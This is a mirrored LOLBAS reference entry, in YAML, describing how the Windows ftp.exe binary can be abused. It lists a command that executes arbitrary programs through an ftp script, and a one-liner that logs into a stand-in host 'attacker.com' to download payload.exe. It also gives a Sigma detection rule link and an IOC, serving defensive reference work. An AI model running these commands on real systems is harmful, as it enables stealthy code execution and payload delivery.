mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-28 15:58:24 +01:00
23dd0236ae
* Add detection links for scripts * Add detection links for OtherMSBins. Fixed and updated as needed. * Add detection links for MSBins. Fixed and updated as needed. * Add detection links for oslibraries * Updating template for Detections * Removing empty Detection:Sigma entries * Remove redundant blank line * Replacing commit URL with file URL Co-authored-by: root <root@DESKTOP-5CR935D.localdomain> Co-authored-by: Wietze <wietze@users.noreply.github.com>
42 lines
1.7 KiB
YAML
42 lines
1.7 KiB
YAML
---
|
|
Name: Ftp.exe
|
|
Description: A binary designed for connecting to FTP servers
|
|
Author: 'Oddvar Moe'
|
|
Created: 2018-12-10
|
|
Commands:
|
|
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
|
|
Description: Executes the commands you put inside the text file.
|
|
Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
|
|
Category: Execute
|
|
Privileges: User
|
|
MitreID: T1202
|
|
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
|
|
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
|
|
Description: Download
|
|
Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.
|
|
Category: Download
|
|
Privileges: User
|
|
MitreID: T1105
|
|
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
|
Full_Path:
|
|
- Path: C:\Windows\System32\ftp.exe
|
|
- Path: C:\Windows\SysWOW64\ftp.exe
|
|
Code_Sample:
|
|
- Code:
|
|
Detection:
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
|
|
- IOC: cmd /c as child process of ftp.exe
|
|
Resources:
|
|
- Link: https://twitter.com/0xAmit/status/1070063130636640256
|
|
- Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939
|
|
- Link: https://ss64.com/nt/ftp.html
|
|
- Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/
|
|
Acknowledgement:
|
|
- Person: Casey Smith
|
|
Handle: '@subtee'
|
|
- Person: BennyHusted
|
|
Handle: ''
|
|
- Person: Amit Serper
|
|
Handle: '@0xAmit '
|
|
---
|